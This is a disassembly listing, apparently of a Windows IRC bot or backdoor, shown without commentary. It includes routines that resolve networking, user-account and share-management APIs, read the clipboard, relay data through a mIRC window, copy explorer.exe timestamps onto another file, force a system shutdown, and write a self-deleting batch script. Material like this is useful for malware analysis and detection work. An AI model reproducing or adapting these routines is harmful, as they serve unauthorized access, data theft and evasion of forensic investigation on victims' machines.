jz short loc_404DEB
cmp eax, ebx
jnz short loc_404DF5
jmp short loc_404DEB
; ---------------------------------------------------------------------------
loc_404DE0: ; CODE XREF: sub_40468E+4A7�j
call ds:dword_41F008 ; RtlGetLastWin32Error
mov dword_433614, eax
loc_404DEB: ; CODE XREF: sub_40468E+646�j
; sub_40468E+652�j ...
mov dword_433610, 1
loc_404DF5: ; CODE XREF: sub_40468E+74E�j
push offset aWininet_dll ; "wininet.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_404EFA
push offset aInternetgetcon ; "InternetGetConnectedState"
push edi
call esi ; GetProcAddress
push offset aInternetgetc_0 ; "InternetGetConnectedStateEx"
push edi
mov dword_433428, eax
call esi ; GetProcAddress
push offset aHttpopenreques ; "HttpOpenRequestA"
push edi
mov dword_4335E8, eax
call esi ; GetProcAddress
push offset aHttpsendreques ; "HttpSendRequestA"
push edi
mov dword_4334C8, eax
call esi ; GetProcAddress
push offset aInternetconnec ; "InternetConnectA"
push edi
mov dword_4335E4, eax
call esi ; GetProcAddress
push offset aInternetopena ; "InternetOpenA"
push edi
mov dword_4334D4, eax
call esi ; GetProcAddress
push offset aInternetopenur ; "InternetOpenUrlA"
push edi
mov dword_433448, eax
call esi ; GetProcAddress
push offset aInternetcracku ; "InternetCrackUrlA"
push edi
mov dword_4334A8, eax
call esi ; GetProcAddress
push offset aInternetreadfi ; "InternetReadFile"
push edi
mov dword_433420, eax
call esi ; GetProcAddress
push offset aInternetcloseh ; "InternetCloseHandle"
push edi
mov dword_43354C, eax
call esi ; GetProcAddress
cmp dword_433428, ebx
mov ecx, dword_433448
mov dword_4334FC, eax
jz short loc_404ED6
cmp dword_4335E8, ebx
jz short loc_404ED6
cmp dword_4334C8, ebx
jz short loc_404ED6
cmp dword_4335E4, ebx
jz short loc_404ED6
cmp dword_4334D4, ebx
jz short loc_404ED6
cmp ecx, ebx
jz short loc_404ED6
cmp dword_4334A8, ebx
jz short loc_404ED6
cmp dword_433420, ebx
jz short loc_404ED6
cmp dword_43354C, ebx
jz short loc_404ED6
cmp eax, ebx
jnz short loc_404EE0
loc_404ED6: ; CODE XREF: sub_40468E+806�j
; sub_40468E+80E�j ...
mov dword_433618, 1
loc_404EE0: ; CODE XREF: sub_40468E+846�j
cmp ecx, ebx
jz short loc_404F15
push ebx
push ebx
push ebx
push ebx
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible)"
call ecx ; InternetOpenA
cmp eax, ebx
mov dword_4335E0, eax
jnz short loc_404F15
jmp short loc_404F0F
; ---------------------------------------------------------------------------
loc_404EFA: ; CODE XREF: sub_40468E+772�j
call ds:dword_41F008 ; RtlGetLastWin32Error
mov dword_43361C, eax
mov dword_433618, 1
loc_404F0F: ; CODE XREF: sub_40468E+86A�j
mov dword_4335E0, ebx
loc_404F15: ; CODE XREF: sub_40468E+854�j
; sub_40468E+868�j
push offset aIcmp_dll ; "icmp.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_404F5F
push offset aIcmpcreatefile ; "IcmpCreateFile"
push edi
call esi ; GetProcAddress
push offset aIcmpclosehandl ; "IcmpCloseHandle"
push edi
mov dword_4334F0, eax
call esi ; GetProcAddress
push offset aIcmpsendecho ; "IcmpSendEcho"
push edi
mov dword_433524, eax
call esi ; GetProcAddress
cmp dword_4334F0, ebx
mov dword_433588, eax
jz short loc_404F6A
cmp dword_433524, ebx
jz short loc_404F6A
cmp eax, ebx
jnz short loc_404F74
jmp short loc_404F6A
; ---------------------------------------------------------------------------
loc_404F5F: ; CODE XREF: sub_40468E+892�j
call ds:dword_41F008 ; RtlGetLastWin32Error
mov dword_433624, eax
loc_404F6A: ; CODE XREF: sub_40468E+8C1�j
; sub_40468E+8C9�j ...
mov dword_433620, 1
loc_404F74: ; CODE XREF: sub_40468E+8CD�j
push offset aNetapi32_dll ; "netapi32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_40506A
push offset aNetshareadd ; "NetShareAdd"
push edi
call esi ; GetProcAddress
push offset aNetsharedel ; "NetShareDel"
push edi
mov dword_433488, eax
call esi ; GetProcAddress
push offset aNetshareenum ; "NetShareEnum"
push edi
mov dword_4334A4, eax
call esi ; GetProcAddress
push offset aNetschedulejob ; "NetScheduleJobAdd"
push edi
mov dword_4335A0, eax
call esi ; GetProcAddress
push offset aNetapibufferfr ; "NetApiBufferFree"
push edi
mov dword_433454, eax
call esi ; GetProcAddress
push offset aNetremotetod ; "NetRemoteTOD"
push edi
mov dword_4334D8, eax
call esi ; GetProcAddress
push offset aNetuseradd ; "NetUserAdd"
push edi
mov dword_43341C, eax
call esi ; GetProcAddress
push offset aNetuserdel ; "NetUserDel"
push edi
mov dword_43346C, eax
call esi ; GetProcAddress
push offset aNetuserenum ; "NetUserEnum"
push edi
mov dword_433568, eax
call esi ; GetProcAddress
push offset aNetusergetinfo ; "NetUserGetInfo"
push edi
mov dword_433480, eax
call esi ; GetProcAddress
push offset aNetmessagebuff ; "NetMessageBufferSend"
push edi
mov dword_43348C, eax
call esi ; GetProcAddress
cmp dword_433488, ebx
mov dword_4334B4, eax
jz short loc_405075
cmp dword_4334A4, ebx
jz short loc_405075
cmp dword_4335A0, ebx
jz short loc_405075
cmp dword_433454, ebx
jz short loc_405075
cmp dword_4334D8, ebx
jz short loc_405075
cmp dword_43341C, ebx
jz short loc_405075
cmp dword_43346C, ebx
jz short loc_405075
cmp dword_433568, ebx
jz short loc_405075
cmp dword_433480, ebx
jz short loc_405075
cmp dword_43348C, ebx
jz short loc_405075
cmp eax, ebx
jnz short loc_40507F
jmp short loc_405075
; ---------------------------------------------------------------------------
loc_40506A: ; CODE XREF: sub_40468E+8F1�j
call ds:dword_41F008 ; RtlGetLastWin32Error
mov dword_43362C, eax
loc_405075: ; CODE XREF: sub_40468E+98C�j
; sub_40468E+994�j ...
mov dword_433628, 1
loc_40507F: ; CODE XREF: sub_40468E+9D8�j
push offset aDnsapi_dll ; "dnsapi.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_4050B4
push offset aDnsflushresolv ; "DnsFlushResolverCache"
push edi
call esi ; GetProcAddress
push offset aDnsflushreso_0 ; "DnsFlushResolverCacheEntry_A"
push edi
mov dword_433584, eax
call esi ; GetProcAddress
cmp dword_433584, ebx
mov dword_433504, eax
jz short loc_4050BF
cmp eax, ebx
jnz short loc_4050C9
jmp short loc_4050BF
; ---------------------------------------------------------------------------
loc_4050B4: ; CODE XREF: sub_40468E+9FC�j
call ds:dword_41F008 ; RtlGetLastWin32Error
mov dword_433634, eax
loc_4050BF: ; CODE XREF: sub_40468E+A1E�j
; sub_40468E+A24�j
mov dword_433630, 1
loc_4050C9: ; CODE XREF: sub_40468E+A22�j
push offset aIphlpapi_dll ; "iphlpapi.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_4050FE
push offset aGetipnettable ; "GetIpNetTable"
push edi
call esi ; GetProcAddress
push offset aDeleteipnetent ; "DeleteIpNetEntry"
push edi
mov dword_4334AC, eax
call esi ; GetProcAddress
cmp dword_4334AC, ebx
mov dword_43350C, eax
jz short loc_405109
cmp eax, ebx
jnz short loc_405113
jmp short loc_405109
; ---------------------------------------------------------------------------
loc_4050FE: ; CODE XREF: sub_40468E+A46�j
call ds:dword_41F008 ; RtlGetLastWin32Error
mov dword_43363C, eax
loc_405109: ; CODE XREF: sub_40468E+A68�j
; sub_40468E+A6E�j
mov dword_433638, 1
loc_405113: ; CODE XREF: sub_40468E+A6C�j
push offset aMpr_dll ; "mpr.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_405172
push offset aWnetaddconnect ; "WNetAddConnection2A"
push edi
call esi ; GetProcAddress
push offset aWnetaddconne_0 ; "WNetAddConnection2W"
push edi
mov dword_433540, eax
call esi ; GetProcAddress
push offset aWnetcancelconn ; "WNetCancelConnection2A"
push edi
mov dword_4335D0, eax
call esi ; GetProcAddress
push offset aWnetcancelco_0 ; "WNetCancelConnection2W"
push edi
mov dword_43347C, eax
call esi ; GetProcAddress
cmp dword_433540, ebx
mov dword_433440, eax
jz short loc_40517D
cmp dword_4335D0, ebx
jz short loc_40517D
cmp dword_43347C, ebx
jz short loc_40517D
cmp eax, ebx
jnz short loc_405187
jmp short loc_40517D
; ---------------------------------------------------------------------------
loc_405172: ; CODE XREF: sub_40468E+A90�j
call ds:dword_41F008 ; RtlGetLastWin32Error
mov dword_433644, eax
loc_40517D: ; CODE XREF: sub_40468E+ACC�j
; sub_40468E+AD4�j ...
mov dword_433640, 1
loc_405187: ; CODE XREF: sub_40468E+AE0�j
push offset aShell32_dll ; "shell32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_4051BC
push offset aShellexecutea ; "ShellExecuteA"
push edi
call esi ; GetProcAddress
push offset aShchangenotify ; "SHChangeNotify"
push edi
mov dword_4335A8, eax
call esi ; GetProcAddress
cmp dword_4335A8, ebx
mov dword_433474, eax
jz short loc_4051C7
cmp eax, ebx
jnz short loc_4051D1
jmp short loc_4051C7
; ---------------------------------------------------------------------------
loc_4051BC: ; CODE XREF: sub_40468E+B04�j
call ds:dword_41F008 ; RtlGetLastWin32Error
mov dword_43364C, eax
loc_4051C7: ; CODE XREF: sub_40468E+B26�j
; sub_40468E+B2C�j
mov dword_433648, 1
loc_4051D1: ; CODE XREF: sub_40468E+B2A�j
push offset aOdbc32_dll ; "odbc32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40525A
push offset aSqldriverconne ; "SQLDriverConnect"
push edi
call esi ; GetProcAddress
push offset aSqlsetenvattr ; "SQLSetEnvAttr"
push edi
mov dword_43358C, eax
call esi ; GetProcAddress
push offset aSqlexecdirect ; "SQLExecDirect"
push edi
mov dword_43345C, eax
call esi ; GetProcAddress
push offset aSqlallochandle ; "SQLAllocHandle"
push edi
mov dword_4335A4, eax
call esi ; GetProcAddress
push offset aSqlfreehandle ; "SQLFreeHandle"
push edi
mov dword_4334C4, eax
call esi ; GetProcAddress
push offset aSqldisconnect ; "SQLDisconnect"
push edi
mov dword_433550, eax
call esi ; GetProcAddress
cmp dword_43358C, ebx
mov dword_433468, eax
jz short loc_405265
cmp dword_43345C, ebx
jz short loc_405265
cmp dword_4335A4, ebx
jz short loc_405265
cmp dword_4334C4, ebx
jz short loc_405265
cmp dword_433550, ebx
jz short loc_405265
cmp eax, ebx
jnz short loc_40526F
jmp short loc_405265
; ---------------------------------------------------------------------------
loc_40525A: ; CODE XREF: sub_40468E+B4E�j
call ds:dword_41F008 ; RtlGetLastWin32Error
mov dword_433654, eax
loc_405265: ; CODE XREF: sub_40468E+BA4�j
; sub_40468E+BAC�j ...
mov dword_433650, 1
loc_40526F: ; CODE XREF: sub_40468E+BC8�j
pop edi
pop esi
xor eax, eax
pop ebp
inc eax
pop ebx
retn
sub_40468E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405277 proc near ; CODE XREF: sub_4078FA+424B�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push ebx
mov ebx, [ebp+arg_4]
push esi
xor esi, esi
cmp dword_4335F0, esi
push edi
mov edi, [ebp+arg_8]
jz short loc_4052BF
push dword_4335F4
lea eax, [ebp+var_200]
push offset aKernel32_dllFa ; "Kernel32.dll failed. <%d>"
push eax
call sub_412BB5
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4045DD
add esp, 20h
loc_4052BF: ; CODE XREF: sub_405277+1A�j
cmp dword_4335F8, esi
jz short loc_4052F3
push dword_4335FC
lea eax, [ebp+var_200]
push offset aUser32_dllFail ; "User32.dll failed. <%d>"
push eax
call sub_412BB5
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4045DD
add esp, 20h
loc_4052F3: ; CODE XREF: sub_405277+4E�j
cmp dword_433600, esi
jz short loc_405327
push dword_433604
lea eax, [ebp+var_200]
push offset aAdvapi32_dllFa ; "Advapi32.dll failed. <%d>"
push eax
call sub_412BB5
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4045DD
add esp, 20h
loc_405327: ; CODE XREF: sub_405277+82�j
cmp dword_433608, esi
jz short loc_40535B
push dword_43360C
lea eax, [ebp+var_200]
push offset aGdi32_dllFaile ; "Gdi32.dll failed. <%d>"
push eax
call sub_412BB5
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4045DD
add esp, 20h
loc_40535B: ; CODE XREF: sub_405277+B6�j
cmp dword_433610, esi
jz short loc_40538F
push dword_433614
lea eax, [ebp+var_200]
push offset aWs2_32_dllFail ; "Ws2_32.dll failed. <%d>"
push eax
call sub_412BB5
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4045DD
add esp, 20h
loc_40538F: ; CODE XREF: sub_405277+EA�j
cmp dword_433618, esi
jz short loc_4053C3
push dword_43361C
lea eax, [ebp+var_200]
push offset aWininet_dllFai ; "Wininet.dll failed. <%d>"
push eax
call sub_412BB5
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4045DD
add esp, 20h
loc_4053C3: ; CODE XREF: sub_405277+11E�j
cmp dword_433620, esi
jz short loc_4053F7
push dword_433624
lea eax, [ebp+var_200]
push offset aIcmp_dllFailed ; "Icmp.dll failed. <%d>"
push eax
call sub_412BB5
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4045DD
add esp, 20h
loc_4053F7: ; CODE XREF: sub_405277+152�j
cmp dword_433628, esi
jz short loc_40542B
push dword_43362C
lea eax, [ebp+var_200]
push offset aNetapi32_dllFa ; "Netapi32.dll failed. <%d>"
push eax
call sub_412BB5
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4045DD
add esp, 20h
loc_40542B: ; CODE XREF: sub_405277+186�j
cmp dword_433630, esi
jz short loc_40545F
push dword_433634
lea eax, [ebp+var_200]
push offset aDnsapi_dllFail ; "Dnsapi.dll failed. <%d>"
push eax
call sub_412BB5
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4045DD
add esp, 20h
loc_40545F: ; CODE XREF: sub_405277+1BA�j
cmp dword_433638, esi
jz short loc_405493
push dword_43363C
lea eax, [ebp+var_200]
push offset aIphlpapi_dllFa ; "Iphlpapi.dll failed. <%d>"
push eax
call sub_412BB5
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4045DD
add esp, 20h
loc_405493: ; CODE XREF: sub_405277+1EE�j
cmp dword_433640, esi
jz short loc_4054C7
push dword_433644
lea eax, [ebp+var_200]
push offset aMpr32_dllFaile ; "Mpr32.dll failed. <%d>"
push eax
call sub_412BB5
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4045DD
add esp, 20h
loc_4054C7: ; CODE XREF: sub_405277+222�j
cmp dword_433648, esi
jz short loc_4054FB
push dword_43364C
lea eax, [ebp+var_200]
push offset aShell32_dllFai ; "Shell32.dll failed. <%d>"
push eax
call sub_412BB5
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4045DD
add esp, 20h
loc_4054FB: ; CODE XREF: sub_405277+256�j
cmp dword_433650, esi
jz short loc_40552F
push dword_433654
lea eax, [ebp+var_200]
push offset aOdbc32_dllFail ; "Odbc32.dll failed. <%d>"
push eax
call sub_412BB5
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4045DD
add esp, 20h
loc_40552F: ; CODE XREF: sub_405277+28A�j
lea eax, [ebp+var_200]
push offset aMainDllTestCom ; "[MAIN]: DLL test complete."
push eax
call sub_412BB5
cmp [ebp+arg_C], esi
pop ecx
pop ecx
jnz short loc_40555C
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4045DD
add esp, 14h
loc_40555C: ; CODE XREF: sub_405277+2CE�j
lea eax, [ebp+var_200]
push eax
call sub_401C33
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_405277 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40556E proc near ; CODE XREF: sub_4078FA+A6A�p
; sub_4078FA+A9D�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_0]
xor esi, esi
cmp edi, esi
jz loc_405645
mov eax, [ebp+arg_4]
cmp eax, esi
jz loc_405645
cmp [ebp+arg_8], esi
jz loc_405645
cmp byte ptr [eax], 0
jz loc_405645
push ebx
push edi
call sub_41E867
mov ebx, eax
test ebx, ebx
pop ecx
jz loc_405640
push [ebp+arg_4]
push edi
call sub_413920
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz short loc_405639
sub eax, edi
push eax
push edi
push ebx
call sub_412C40
mov eax, ebx
sub eax, edi
add esp, 0Ch
and byte ptr [eax+esi], 0
mov eax, [ebp+arg_8]
lea ecx, [eax+1]
loc_4055DB: ; CODE XREF: sub_40556E+72�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4055DB
sub eax, ecx
push eax
push [ebp+arg_8]
push ebx
call sub_412A80
mov eax, [ebp+arg_4]
add esp, 0Ch
lea ecx, [eax+1]
loc_4055F7: ; CODE XREF: sub_40556E+8E�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4055F7
sub eax, ecx
add eax, esi
mov esi, eax
loc_405604: ; CODE XREF: sub_40556E+9B�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_405604
mov edi, ebx
sub eax, esi
dec edi
loc_405610: ; CODE XREF: sub_40556E+A8�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_405610
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov esi, [ebp+arg_0]
mov edx, esi
mov eax, ebx
sub edx, ebx
loc_40562F: ; CODE XREF: sub_40556E+C9�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_40562F
loc_405639: ; CODE XREF: sub_40556E+50�j
push ebx
call sub_412FE4
pop ecx
loc_405640: ; CODE XREF: sub_40556E+3B�j
mov eax, esi
pop ebx
jmp short loc_405647
; ---------------------------------------------------------------------------
loc_405645: ; CODE XREF: sub_40556E+C�j
; sub_40556E+17�j ...
xor eax, eax
loc_405647: ; CODE XREF: sub_40556E+D5�j
pop edi
pop esi
pop ebp
retn
sub_40556E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40564B proc near ; CODE XREF: sub_40751F+C2�p
var_7D0 = dword ptr -7D0h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 7D0h
push ebx
push esi
push edi
xor eax, eax
mov ecx, 1F4h
lea edi, [ebp+var_7D0]
rep stosd
mov ecx, [ebp+arg_0]
mov eax, ecx
lea esi, [eax+1]
loc_40566E: ; CODE XREF: sub_40564B+28�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40566E
sub eax, esi
xor ebx, ebx
mov edi, eax
inc ebx
cmp edi, ebx
jge short loc_405685
or eax, 0FFFFFFFFh
jmp short loc_4056E5
; ---------------------------------------------------------------------------
loc_405685: ; CODE XREF: sub_40564B+33�j
xor edx, edx
test edi, edi
mov [ebp+var_7D0], ecx
jle short loc_4056A5
loc_405691: ; CODE XREF: sub_40564B+58�j
mov al, [edx+ecx]
cmp al, 0Ah
jz short loc_40569C
cmp al, 0Dh
jnz short loc_4056A0
loc_40569C: ; CODE XREF: sub_40564B+4B�j
and byte ptr [edx+ecx], 0
loc_4056A0: ; CODE XREF: sub_40564B+4F�j
inc edx
cmp edx, edi
jl short loc_405691
loc_4056A5: ; CODE XREF: sub_40564B+44�j
xor esi, esi
test edi, edi
jle short loc_4056CF
loc_4056AB: ; CODE XREF: sub_40564B+82�j
cmp byte ptr [esi+ecx], 0
jnz short loc_4056CA
lea edx, [esi+ecx+1]
cmp byte ptr [edx], 0
jz short loc_4056CA
cmp ebx, 1F4h
jge short loc_4056CF
mov [ebp+ebx*4+var_7D0], edx
inc ebx
loc_4056CA: ; CODE XREF: sub_40564B+64�j
; sub_40564B+6D�j
inc esi
cmp esi, edi
jl short loc_4056AB
loc_4056CF: ; CODE XREF: sub_40564B+5E�j
; sub_40564B+75�j
mov edi, [ebp+arg_4]
test edi, edi
jz short loc_4056E3
mov ecx, 1F4h
lea esi, [ebp+var_7D0]
rep movsd
loc_4056E3: ; CODE XREF: sub_40564B+89�j
mov eax, ebx
loc_4056E5: ; CODE XREF: sub_40564B+38�j
pop edi
pop esi
pop ebx
leave
retn
sub_40564B endp
; =============== S U B R O U T I N E =======================================
sub_4056EA proc near ; CODE XREF: sub_405A98+26�p
; sub_405AD5+79�p
arg_0 = byte ptr 4
movsx eax, [esp+arg_0]
push eax
call sub_413A6E
cmp al, 61h
pop ecx
jl short loc_405705
cmp al, 7Ah
jg short loc_405705
movsx eax, al
sub eax, 60h
retn
; ---------------------------------------------------------------------------
loc_405705: ; CODE XREF: sub_4056EA+E�j
; sub_4056EA+12�j
xor eax, eax
retn
sub_4056EA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405708 proc near ; CODE XREF: sub_4078FA+2B12�p
; sub_4078FA+3596�p
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 100h
push esi
call ds:dword_41F008 ; RtlGetLastWin32Error
push 0
push 100h
mov esi, eax
lea eax, [ebp+var_100]
push eax
push 400h
push esi
push 0
push 1200h
call ds:dword_41F07C ; FormatMessageA
lea eax, [ebp+var_100]
loc_405741: ; CODE XREF: sub_405708+46�j
mov cl, [eax]
cmp cl, 1Fh
jg short loc_40574D
cmp cl, 9
jnz short loc_405750
loc_40574D: ; CODE XREF: sub_405708+3E�j
inc eax
jmp short loc_405741
; ---------------------------------------------------------------------------
loc_405750: ; CODE XREF: sub_405708+43�j
; sub_405708+5B�j ...
and byte ptr [eax], 0
dec eax
lea ecx, [ebp+var_100]
cmp eax, ecx
jb short loc_40576A
mov cl, [eax]
cmp cl, 2Eh
jz short loc_405750
cmp cl, 21h
jl short loc_405750
loc_40576A: ; CODE XREF: sub_405708+54�j
push esi
lea eax, [ebp+var_100]
push eax
push [ebp+arg_0]
mov esi, offset dword_433660
push offset aSErrorSD_ ; "%s Error: %s <%d>."
push 200h
push esi
call sub_412E0D
add esp, 18h
mov eax, esi
pop esi
leave
retn
sub_405708 endp
; =============== S U B R O U T I N E =======================================
sub_405792 proc near ; CODE XREF: sub_4078FA+41DF�p
push esi
push 0
call dword_43344C ; OpenClipboard
test eax, eax
jz short loc_4057C9
push 1
call dword_4335CC ; GetClipboardData
mov esi, eax
test esi, esi
jz short loc_4057C9
push edi
push esi
call ds:dword_41F084 ; GlobalLock
push esi
mov edi, eax
call ds:dword_41F080 ; GlobalUnlock
call dword_433430 ; CloseClipboard
mov eax, edi
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_4057C9: ; CODE XREF: sub_405792+B�j
; sub_405792+19�j
xor eax, eax
pop esi
retn
sub_405792 endp
; =============== S U B R O U T I N E =======================================
sub_4057CD proc near ; CODE XREF: sub_4078FA+34F6�p
arg_0 = dword ptr 4
push ebp
push esi
push edi
xor esi, esi
push esi
mov edi, offset aMirc_0 ; "mIRC"
push edi
call dword_4334F8 ; FindWindowA
mov ebp, eax
cmp ebp, esi
jz short loc_405849
push ebx
push edi
push 1000h
push esi
push 4
push esi
push 0FFFFFFFFh
call ds:dword_41F090 ; CreateFileMappingA
push esi
push esi
push esi
mov edi, eax
push 0F001Fh
push edi
call ds:dword_41F08C ; MapViewOfFile
push [esp+10h+arg_0]
mov ebx, eax
push ebx
call sub_412BB5
pop ecx
pop ecx
push esi
push 1
push 4C8h
push ebp
call dword_433560 ; SendMessageA
push esi
push 1
push 4C9h
push ebp
call dword_433560 ; SendMessageA
push ebx
call ds:dword_41F088 ; UnmapViewOfFile
push edi
call ds:dword_41F034 ; CloseHandle
xor eax, eax
inc eax
pop ebx
jmp short loc_40584B
; ---------------------------------------------------------------------------
loc_405849: ; CODE XREF: sub_4057CD+16�j
xor eax, eax
loc_40584B: ; CODE XREF: sub_4057CD+7A�j
pop edi
pop esi
pop ebp
retn
sub_4057CD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40584F proc near ; CODE XREF: sub_40D1EF+21E�p
var_11C = byte ptr -11Ch
var_18 = byte ptr -18h
var_10 = byte ptr -10h
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 11Ch
push esi
xor esi, esi
push esi
lea eax, [ebp+var_11C]
push eax
push 104h
push esi
push offset aExplorer_exe ; "explorer.exe"
push esi
call dword_4334C0 ; SearchPathA
test eax, eax
jz short loc_4058F0
push ebx
push edi
push esi
mov edi, 80h
push edi
push 3
push esi
mov esi, ds:dword_41F03C
push 1
push 80000000h
lea eax, [ebp+var_11C]
push eax
call esi ; CreateFileA
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_4058EE
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
push ebx
call ds:dword_41F098 ; GetFileTime
push ebx
mov ebx, ds:dword_41F034
call ebx ; CloseHandle
push 0
push edi
push 3
push 0
push 2
push 40000000h
push [ebp+arg_0]
call esi ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_4058EE
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
push esi
call ds:dword_41F094 ; SetFileTime
push esi
call ebx ; CloseHandle
loc_4058EE: ; CODE XREF: sub_40584F+51�j
; sub_40584F+87�j
pop edi
pop ebx
loc_4058F0: ; CODE XREF: sub_40584F+28�j
pop esi
leave
retn
sub_40584F endp
; =============== S U B R O U T I N E =======================================
sub_4058F3 proc near ; CODE XREF: sub_4078FA+11A9�p
push 1
push offset aSeshutdownpriv ; "SeShutdownPrivilege"
call sub_40707D
pop ecx
pop ecx
push 50005h
push 6
call dword_433538 ; ExitWindowsEx
neg eax
sbb eax, eax
neg eax
retn
sub_4058F3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405915 proc near ; CODE XREF: sub_401F06+495�p
; sub_4078FA+4492�p
var_764 = byte ptr -764h
var_364 = byte ptr -364h
var_260 = byte ptr -260h
var_15C = byte ptr -15Ch
var_58 = dword ptr -58h
var_4C = dword ptr -4Ch
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_14 = byte ptr -14h
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 764h
push ebx
xor ebx, ebx
cmp dword_42AE58, ebx
push esi
jz short loc_405939
cmp dword_433600, ebx
jnz short loc_405939
push ebx
call sub_401E73
pop ecx
loc_405939: ; CODE XREF: sub_405915+13�j
; sub_405915+1B�j
lea eax, [ebp+var_764]
push eax
push 400h
call ds:dword_41F0A4 ; GetTempPathA
lea eax, [ebp+var_764]
push eax
lea eax, [ebp+var_260]
push offset aSdel_bat ; "%sdel.bat"
push eax
call sub_412BB5
add esp, 0Ch
push ebx
push ebx
push 2
push ebx
push ebx
push 40000000h
lea eax, [ebp+var_260]
push eax
call ds:dword_41F03C ; CreateFileA
mov esi, eax
cmp esi, ebx
jbe loc_405A94
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+var_764]
push offset a@echoOffRepeat ; "@echo off\r\n:repeat\r\ndel \"%%1\"\r\nif exist"...
push eax
call sub_412BB5
lea eax, [ebp+var_764]
add esp, 0Ch
lea edx, [eax+1]
loc_4059AC: ; CODE XREF: sub_405915+9C�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_4059AC
push edi
push ebx
lea ecx, [ebp+var_4]
push ecx
sub eax, edx
push eax
lea eax, [ebp+var_764]
push eax
push esi
call ds:dword_41F038 ; WriteFile
push esi
call ds:dword_41F034 ; CloseHandle
xor eax, eax
lea edi, [ebp+var_14]
stosd
stosd
stosd
push 11h
stosd
pop ecx
xor eax, eax
lea edi, [ebp+var_58]
rep stosd
mov esi, 104h
push esi
lea eax, [ebp+var_15C]
push eax
push ebx
mov [ebp+var_4C], 41FA76h
mov [ebp+var_58], 44h
mov [ebp+var_2C], 1
mov [ebp+var_28], bx
call ds:dword_41F078 ; GetModuleHandleA
push eax
call ds:dword_41F010 ; GetModuleFileNameA
lea eax, [ebp+var_15C]
push eax
call ds:dword_41F06C ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
pop edi
jz short loc_405A3D
push 80h
lea eax, [ebp+var_15C]
push eax
call ds:dword_41F0A0 ; SetFileAttributesA
loc_405A3D: ; CODE XREF: sub_405915+114�j
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+var_764]
push offset aComspecCSS ; "%%comspec%% /c %s %s"
push eax
call sub_412BB5
add esp, 10h
push esi
lea eax, [ebp+var_364]
push eax
lea eax, [ebp+var_764]
push eax
call ds:dword_41F09C ; ExpandEnvironmentStringsA
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_58]
push eax
push ebx
push ebx
push 4010h
